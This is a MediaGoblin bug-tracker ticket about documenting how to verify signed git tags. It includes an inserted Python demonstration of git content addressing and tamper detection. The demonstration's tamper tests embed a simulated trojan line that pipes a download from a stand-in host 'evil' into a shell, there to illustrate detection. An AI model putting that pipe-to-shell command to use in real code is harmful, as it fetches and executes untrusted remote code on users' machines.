#787 closed defect (fixed)
Instructions should include a recommendation that users check signatures
Reported by: | anongoblin | Owned by: | |
---|---|---|---|
Priority: | major | Milestone: | 1.0 |
Component: | documentation | Keywords: | |
Cc: | Alex Jordan | Parent Tickets: | |
Description
On http://mediagoblin.readthedocs.org/en/v0.5.1/siteadmin/deploying.html , the instructions for deploying mediagoblin itself are:
```
git clone git://gitorious.org/mediagoblin/mediagoblin.git
cd mediagoblin
git submodule init && git submodule update
```
It would probably be a good idea to recommend that users make sure that they're getting the real mediagoblin code, and not a trojan or something. One part of doing that would be to point them at the https URL (see #786), but since tags are signed, it might be a good idea to include instructions for checking signed tags too.
Attachments (2)
Change History (15)
comment:1 by , 11 years ago
Parent Tickets: | → 786 |
---|
comment:2 by , 11 years ago
comment:3 by , 10 years ago
So there are kind of two things here, one of them is to tell users to check the GPG key... good idea! That suggestion should be added to the docs.
Here's my key fingerprint, in case that helps:
Key fingerprint = 510A 8628 E2A7 7678 8F8C 709C 4BC0 2592 5FF8 F4D3
Secondly, updating the docs to check out a specific tag is a good idea... though it may require some rethinking of how the deployment docs are written, particularly on "how to upgrade to a new version".
comment:5 by , 10 years ago
I do like the idea of being able to verify software installed via pip. I'm entirely unsure how to do this, though.
With regard to anongoblin's initial suggestion that we present users with a way to not install from master, this is fixed in the current docs version. We request that users clone the stable branch:
```
git clone https://gitorious.org/mediagoblin/mediagoblin.git -b stable
```
I'll leave this ticket open for now, but would appreciate more direction on what should be checked via the GPG key. I'm comfortable with verifying a single file via GPG, but am not certain what should be verified if someone is pulling in the entire MediaGoblin stack.
comment:6 by , 9 years ago
Parent Tickets: | 786 |
---|
comment:7 by , 9 years ago
Cc: | added |
---|
jcampbell: I believe anongoblin is suggesting that the Git tag be verified, not an individual file. IIRC you can do this with `git tag --verify $tag`.
(The longer explanation is that verifying a Git tag essentially serves to verify the entire source checkout, because if any file in the tree were to be tampered with, that would change the SHA1s of commit and tree objects, which would then not be referenced by the signed tag.)
Of course, that doesn't cover all the stuff that Pip is downloading, but it's a start...
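The argument in comment 7 (a signed tag pins one commit id, and every file hangs off that id through content-addressed hashes) is easy to see by rebuilding Git's object naming in a few lines. The block below is an added example written for this page; it is not MediaGoblin code and not part of the ticket. It computes real Git object ids (blob, tree, commit) with the same `"<type> <size>\0<payload>"` SHA-1 scheme git uses, then stands in for the PGP signature with an HMAC over the tag body. That HMAC, the `IDENT` line, the key bytes and the two sample files are constructed assumptions for an offline demonstration; they are not how `git tag -s` or `gpg` actually sign, and the tree is flat (no subdirectories) to keep it short.

```python
import hashlib
import hmac

IDENT = "Example Dev <dev@example.invalid> 1400000000 +0000"  # constructed, fixed for determinism
SIG_BEGIN = b"-----BEGIN STANDIN SIGNATURE-----\n"             # stand-in for a PGP armor block


def git_object_id(kind, payload):
    """SHA-1 of "<kind> <size>\\0<payload>": the name git gives every object (git hash-object)."""
    return hashlib.sha1(f"{kind} {len(payload)}".encode() + b"\x00" + payload).hexdigest()


def tree_payload(blob_ids):
    """Flat tree object: "<mode> <name>\\0<20 raw sha bytes>" per entry, sorted by name."""
    return b"".join(b"100644 " + name.encode() + b"\x00" + bytes.fromhex(sha)
                    for name, sha in sorted(blob_ids.items()))


def parse_tree(payload):
    """Inverse of tree_payload: {name: blob sha hex}."""
    entries, i = {}, 0
    while i < len(payload):
        nul = payload.index(b"\x00", i)
        name = payload[i:nul].split(b" ", 1)[1].decode()
        entries[name] = payload[nul + 1:nul + 21].hex()
        i = nul + 21
    return entries


def make_release(files, message, tag_name, key):
    """Build blob -> tree -> commit objects plus a signed tag (what `git commit` + `git tag -s` produce)."""
    objects, blob_ids = {}, {}
    for name, content in files.items():
        sha = git_object_id("blob", content)
        objects[sha] = ("blob", content)
        blob_ids[name] = sha
    tree = tree_payload(blob_ids)
    tree_sha = git_object_id("tree", tree)
    objects[tree_sha] = ("tree", tree)
    commit = f"tree {tree_sha}\nauthor {IDENT}\ncommitter {IDENT}\n\n{message}\n".encode()
    commit_sha = git_object_id("commit", commit)
    objects[commit_sha] = ("commit", commit)
    body = f"object {commit_sha}\ntype commit\ntag {tag_name}\ntagger {IDENT}\n\n{tag_name}\n".encode()
    # Stand-in signature (HMAC, constructed key) over the tag body, which names exactly one commit id.
    sig = hmac.new(key, body, hashlib.sha256).hexdigest().encode()
    return objects, body + SIG_BEGIN + sig + b"\n"


def verify_tagged_checkout(tag_obj, objects, worktree, key):
    """True only if the tag signature checks AND every file is what the pinned commit says.

    Step 1 is the job of `git tag --verify`; steps 2-4 are what git's content addressing
    guarantees (and what `git fsck` re-checks). Together they cover the whole source tree.
    """
    body, _, sig = tag_obj.partition(SIG_BEGIN)
    expected = hmac.new(key, body, hashlib.sha256).hexdigest().encode()
    if not hmac.compare_digest(sig.strip(), expected):
        return False                                    # 1. missing, bad or foreign signature
    commit_sha = body.split(b"\n")[0].split(b" ")[1].decode()
    kind, commit = objects.get(commit_sha, (None, b""))
    if kind != "commit" or git_object_id("commit", commit) != commit_sha:
        return False                                    # 2. commit object is not the one signed for
    tree_sha = commit.split(b"\n")[0].split(b" ")[1].decode()
    kind, tree = objects.get(tree_sha, (None, b""))
    if kind != "tree" or git_object_id("tree", tree) != tree_sha:
        return False                                    # 3. tree does not match the commit
    entries = parse_tree(tree)
    if set(entries) != set(worktree):
        return False                                    # 4a. files added or removed
    for name, sha in entries.items():
        kind, blob = objects.get(sha, (None, b""))
        if kind != "blob" or git_object_id("blob", blob) != sha or worktree[name] != blob:
            return False                                # 4b. file content differs from its blob
    return True


# Constructed release: a two-file tree standing in for the MediaGoblin checkout.
RELEASE_KEY = b"maintainer-signing-key (constructed stand-in for a GPG private key)"
FILES = {"setup.py": b"from setuptools import setup\nsetup(name='mediagoblin')\n",
         "app.py": b"def main():\n    return 'hello'\n"}
OBJECTS, TAG = make_release(FILES, "Release v0.9.0", "v0.9.0", RELEASE_KEY)


def check_clean():
    """Untouched checkout verifies."""
    return verify_tagged_checkout(TAG, OBJECTS, dict(FILES), RELEASE_KEY)


def check_tampered_file():
    """A mirror serves the right objects but one trojaned working file: step 4b fails."""
    wt = dict(FILES, **{"app.py": b"import os; os.system('curl evil | sh')\n"})
    return verify_tagged_checkout(TAG, OBJECTS, wt, RELEASE_KEY)


def check_tampered_history():
    """An attacker rebuilds blob/tree/commit around the trojan and re-points the tag,
    but cannot sign the new object line with the maintainer's key: step 1 fails."""
    evil = dict(FILES, **{"app.py": b"import os; os.system('curl evil | sh')\n"})
    evil_objects, evil_tag = make_release(evil, "Release v0.9.0", "v0.9.0", b"attacker-key")
    return verify_tagged_checkout(evil_tag, evil_objects, evil, RELEASE_KEY)
```

Two caveats the example makes visible. The check is only as good as the key: the fingerprint has to be obtained out of band (the one posted in comment 3, for instance) and compared against what `gpg` reports, otherwise any signature "verifies". And a branch name such as `stable`, or a lightweight (unsigned) tag, is just a movable pointer; only the signed annotated tag pins a commit id, which is why the docs should tell users to check out and verify the tag rather than a branch. Pip-installed dependencies remain outside this chain, as comment 7 notes.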
comment:8 by , 9 years ago
Owner: | set to |
---|---|
Status: | new → in_progress |
I just attached a patch. Note that it *does not work yet*. I need someone to explain to me why the `origin/master` branch contains work that the `v0.9.0` tag does not, and then I can fix the documentation.
Also, I'm assuming that all releases are signed by cwebber. If this isn't the case, that needs to be fixed as well.
comment:9 by , 9 years ago
So, strugee asked why we have the tags and master and stable, so here's clarification:
- origin/master: Contains our latest development code, we're working on it towards the next release
- vX.X.X tag: release with vX.X.X version
- stable: latest release, possibly with a couple of small cleanup commits on top of it (this allows users to have an easy branch to keep their mediagoblin checkout set to, and also allows us to make minor documentation fixes and etc without putting out a full new release)
comment:10 by , 9 years ago
Whoops, I typo'd. I meant `origin/stable`, not `origin/master`. In any case, you answered my question. Thanks! I'll attach a new patch shortly.
by , 9 years ago
Attachment: | 0001-Document-how-to-verify-git-tag-signatures-v2.patch added |
---|
patch v2
comment:11 by , 9 years ago
Owner: | removed |
---|---|
Status: | in_progress → review |
Aaaaand done! This is ready for review.
comment:12 by , 9 years ago
Resolution: | → fixed |
---|---|
Status: | review → closed |
Looks great! Thanks Strugee! I merged it!
comment:13 by , 9 years ago
Milestone: | → 1.0 |
---|
Probably, the instructions should also include the instructions to check out a tag, so that people following the "v0.5.1" installation instructions don't wind up installing the latest patches on git master.